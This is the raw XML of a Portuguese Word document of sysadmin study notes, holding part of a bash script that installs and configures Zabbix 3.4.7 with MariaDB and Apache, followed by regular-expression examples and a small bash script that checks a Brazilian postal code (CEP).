OPTION;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printf "\n\033[31mFalha na criação do banco de dados no MariaDB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printf "\n\033[44;1;38m3. Configurando o PHP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sed -i 's/;date.timezone =/date.timezone = "America\/Sao_Paulo"/g' /etc/php/7.0/apache2/php.in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sed -i 's/max_execution_time = 30/max_execution_time = 300/g' /etc/php/7.0/apache2/php.in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sed -i 's/max_input_time = 60/max_input_time = 300/g' /etc/php/7.0/apache2/php.in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sed -i 's/post_max_size = 8M/post_max_size = 16M/g' /etc/php/7.0/apache2/php.in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sed -i 's/;always_populate_raw_post_data = -1/always_populate_raw_post_data = -1/g' /etc/php/7.0/apache2/php.in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/etc/init.d/apache2 restart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printf "\n\033[31mFalha na configuração do PHP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printf "\n\033[44;1;38m4. Instalando o Zabbix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sleep 2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printf "\n\033[36m4.1. Criando usuário zabbix, descompactando tarball e populando banco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sleep 2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adduser zabbix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cp zabbix-3.4.7.tar.gz /usr/src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cd /usr/src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tar -zxvf zabbix-3.4.7.tar.gz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chmod -R +x zabbix-3.4.7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printf "\n\033[36m4.2. Populando o banco de dados no MariaDB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cat zabbix-3.4.7/database/mysql/schema.sql |mysql -uzabbix -pzabbix zabbix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cat zabbix-3.4.7/database/mysql/images.sql | mysql -uzabbix -pzabbix zabbix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cat zabbix-3.4.7/database/mysql/data.sql | mysql -uzabbix -pzabbix zabbix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printf "\n\033[36m4.3. Compilando e Instalando Zabbix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# sleep 2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cd zabbix-3.4.7/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./configure --enable-server --enable-agent --with-mysql --with-jabber=/usr --with-libcurl=/usr/bin/curl-config --with-ssh2 --with-openipmi --with-libxml2 --with-net-snmp &amp;&amp; printf "\n\033[45;1;32mConfigurado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# sleep 2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make install &amp;&amp; printf "\n\033[45;1;32mCompilado e Instalado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# sleep 2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printf "\n\033[31mFalha na Compilação e Instalação Zabbix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printf "\n\033[44;1;38m5. Configurando Zabbix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# sleep 2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printf "\n\033[36m5.1. Configurando Agent Zabbix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leep 2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PidFile=\/tmp\/zabbix_agentd.pid/PidFile=\/tmp\/zabbix_agentd.pid/g' /usr/local/etc/zabbix_agentd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LogFileSize=1/LogFileSize=2/g' /usr/local/etc/zabbix_agentd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DebugLevel=3/DebugLevel=3/g' /usr/local/etc/zabbix_agentd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ListenPort=10050/ListenPort=10050/g' /usr/local/etc/zabbix_agentd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Hostname=Zabbix server/Hostname=zabbixServer/g' /usr/local/etc/zabbix_agentd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debian/zabbixServer/g' /etc/hostnam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Timeout=3/Timeout=3/g' /usr/local/etc/zabbix_agentd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printf "\n\033[36m5.2. Configurando Zabbix Server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ListenPort=10051/ListenPort=10051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LogFileSize=1/LogFileSize=2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PidFile=\/tmp\/zabbix_server.pid/PidFile=\/tmp\/zabbix_server.pid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DBHost=localhost/DBHost=localhost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DBPassword=/DBPassword=zabbix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StartIPMIPollers=0/StartIPMIPollers=1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StartDiscoverers=1/StartDiscoverers=5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Timeout=4/Timeout=3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sed -i 's/# FpingLocation=\/usr\/sbin\/fping/FpingLocation=\/usr\/bin\/fping/g' /usr/local/etc/zabbix_server.conf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printf "\n\033[36m5.3. Copiando os arquivos de frontend do Zabbix para o diretório /var/www/html/zabbix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mkdir /var/www/html/zabbix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cp -R /usr/src/zabbix-3.4.7/frontends/php/* /var/www/html/zabbix/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# Tornando os arquivos executáveis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chown -R www-data:www-data /var/www/html/zabbix/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cp /usr/src/zabbix_server /etc/init.d/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cp /usr/src/zabbix_agentd /etc/init.d/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chmod +x /etc/init.d/zabbix_server /etc/init.d/zabbix_agentd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# Executando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/etc/init.d/zabbix_server start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/etc/init.d/zabbix_agentd start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# Habilitando os scripts para serem executados quando o computador for ligado.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update-rc.d -f zabbix_server defaults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update-rc.d -f zabbix_agentd defaults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if [ $? != 0 ]; then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printf "\n\033[31mFalha na Instalação do Zabbix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echo "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else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cd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rm /usr/src/script-instalacao*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rm -rf /usr/src/zabbix*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printf "\n\033[33mFinalizada Instalação.\033[0;0m\n\n"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        f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        f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        f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        f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        f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        f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        f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        fi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8251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 xml:space="preserve">        fi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018784A" w:rsidRPr="00B46D42" w:rsidRDefault="00B8251A" w:rsidP="00B8251A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B46D42">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRPr="00B46D42" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRPr="00B46D42" w:rsidRDefault="00811A8E" w:rsidP="00811A8E"/>
    <w:p w:rsidR="00F53AAC" w:rsidRPr="00C2348E" w:rsidRDefault="00C2348E" w:rsidP="006C04DD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C2348E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EXPRESSÕES REGULARES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C2348E" w:rsidRPr="00C2348E" w:rsidRDefault="00C2348E" w:rsidP="00F5129A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C2348E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Expressão para filtrar um CEP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2348E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[0-9]{5}-[0-9]{3}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C2348E" w:rsidRDefault="00C2348E" w:rsidP="00F62BBA">
      <w:pPr>
        <w:spacing w:after="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C2348E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>65478-365</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3E2B" w:rsidRPr="00C2348E" w:rsidRDefault="00DC3E2B" w:rsidP="00F62BBA">
      <w:pPr>
        <w:spacing w:after="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C2348E" w:rsidRDefault="00C2348E" w:rsidP="00F62BBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C2348E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Expressão para filtrar um número de telefone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2348E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[(][0-9]{2}[)]9[0-9]{4}-[0-9]{4}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C2348E" w:rsidRDefault="00C2348E" w:rsidP="00F62BBA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11)95874-6358</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008451E3" w:rsidRDefault="008451E3" w:rsidP="00F62BBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C04DD" w:rsidRDefault="006C04DD" w:rsidP="00F62BBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C04DD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Expressão para validar hora</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="008451E3" w:rsidRPr="008451E3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>([01][0-9]|2[0-3]):[0-5][0-9]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008451E3" w:rsidRDefault="008451E3" w:rsidP="00F62BBA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4:00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008451E3" w:rsidRDefault="008451E3" w:rsidP="00F62BBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008451E3" w:rsidRDefault="008451E3" w:rsidP="00F62BBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008451E3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Expressão para validar uma data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="008451E3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>([0-2][0-9]|3[01])/(0[0-9]|1[0-2])/[0-9]{4}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008451E3" w:rsidRDefault="008451E3" w:rsidP="00F62BBA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4/12/2000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008451E3" w:rsidRDefault="008451E3" w:rsidP="00F62BBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008451E3" w:rsidRDefault="00DC3E2B" w:rsidP="00F62BBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3E2B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Expressão para validar e-mail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3E2B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>([0-9]|[a-z]|[A-Z]|[-_</w:t>
      </w:r>
      <w:r w:rsidR="000301ED">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3E2B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>])*[@]([0-9]|[a-z]|[A-Z])*[.]([a-z]|[A-Z]|[.])*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3E2B" w:rsidRDefault="00DC3E2B" w:rsidP="00F62BBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3E2B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>priscila_25@bol.uol.com.br</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3E2B" w:rsidRDefault="00DC3E2B" w:rsidP="00F62BBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3BBC" w:rsidRPr="009B3BBC" w:rsidRDefault="009B3BBC" w:rsidP="009B3BBC">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B3BBC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SCRIPT PARA O CEP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3BBC" w:rsidRDefault="009B3BBC" w:rsidP="009B3BB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#!/bin/bash</w:t>
      </w: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  <w:r w:rsidRPr="009B3BBC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>echo "Digite um CEP"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3BBC" w:rsidRDefault="009B3BBC" w:rsidP="009B3BB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ead cep</w:t>
      </w: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  <w:r w:rsidRPr="009B3BBC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cepValido=$(echo $cep|grep -E "^[0-9]{5}-[0-9]{3}$")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#^$ = só aceita a expressão regular; cerca a expressão</w:t>
      </w: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#=$() = armazena o resultado de um comando </w:t>
      </w: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  <w:r w:rsidRPr="009B3BBC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>if [ -z $cepValido ]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#-z = nulo</w:t>
      </w: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  <w:r w:rsidRPr="009B3BBC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>then</w:t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</w:r>
      <w:r w:rsidR="006A7518">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>#-E = versão estendida de expressões regulares</w:t>
      </w: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  <w:r w:rsidRPr="009B3BBC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        echo "CEP errado"</w:t>
      </w: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  <w:r w:rsidRPr="009B3BBC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3BBC" w:rsidRPr="009B3BBC" w:rsidRDefault="009B3BBC" w:rsidP="009B3BBC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B3BBC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        echo "CEP correto"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3BBC" w:rsidRDefault="009B3BBC" w:rsidP="009B3BBC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B3BBC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C3594D" w:rsidRDefault="00C3594D" w:rsidP="009B3BBC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC3E2B" w:rsidRDefault="00DC3E2B" w:rsidP="00F62BBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC3E2B" w:rsidRDefault="00DC3E2B" w:rsidP="00F62BBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC3E2B" w:rsidRDefault="00DC3E2B" w:rsidP="00F62BBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F62BBA" w:rsidRDefault="00F62BBA" w:rsidP="00F62BBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F62BBA" w:rsidRPr="00C2348E" w:rsidRDefault="00F62BBA" w:rsidP="00F5129A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C2348E" w:rsidRPr="00C2348E" w:rsidRDefault="00C2348E" w:rsidP="00F5129A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F5129A" w:rsidRPr="00C2348E" w:rsidRDefault="00F5129A" w:rsidP="00F5129A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00382156" w:rsidRPr="00B46D42" w:rsidRDefault="00382156" w:rsidP="006E2401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475AC8" w:rsidRPr="006E2401" w:rsidRDefault="00475AC8" w:rsidP="006E2401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C74DAE" w:rsidRPr="006E2401" w:rsidRDefault="00C74DAE" w:rsidP="006E2401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C74DAE" w:rsidRPr="006E2401" w:rsidRDefault="00C74DAE" w:rsidP="006E2401">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD023A" w:rsidRPr="006E2401" w:rsidRDefault="00DD023A" w:rsidP="006E2401">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DD023A" w:rsidRPr="006E2401" w:rsidSect="003821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828"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E37A67A4"/>
    <w:lvl w:ilvl="0" w:tplc="A0127D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2D79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40A2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8349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1883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8AA4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E58C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2FFA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0067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65EF7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE9C3E6E"/>
    <w:lvl w:ilvl="0" w:tplc="EE4EDF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700"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="111A79DE"/>
    <w:lvl w:ilvl="0" w:tplc="971468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64C7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6CFA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6AB7F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E70E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D6B77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4B65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6841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25D3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F3F5D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="308615A0"/>
    <w:lvl w:ilvl="0" w:tplc="DD6E58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62708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18AF7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6436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236B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C6B5A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67E7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29AE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E7E7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B15472"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ABA42728"/>
    <w:lvl w:ilvl="0" w:tplc="940E61BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•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327C0A08">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o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1116E9D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪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C3F4090E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•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236F374">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o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654A47A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪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74654B0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•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D90F098">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o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2DECAB4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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C92C17"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7716227C"/>
    <w:lvl w:ilvl="0" w:tplc="6CA6BE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EF23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EF97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84C2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C74C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AD16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2E3B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EB11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0834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A04EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0AAF996"/>
    <w:lvl w:ilvl="0" w:tplc="84D2DEF2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•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9A4CBF4A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o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ED4E82CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪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2466A32C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•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5568F132">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o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BD68B57C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪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F34436F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•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D712858C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o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F31C3CA8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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0F57C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5ABC54CC"/>
    <w:lvl w:ilvl="0" w:tplc="7CE4B114">
      <w:start w:val="21"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2731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1" w:tplc="BE0C4E82">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="290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2" w:tplc="69D0F004">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="362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3" w:tplc="5D3886A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="434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4" w:tplc="369A44CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="506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5" w:tplc="B7E0B5DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="578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6" w:tplc="AC328724">
      <w:start w:val="1"/>
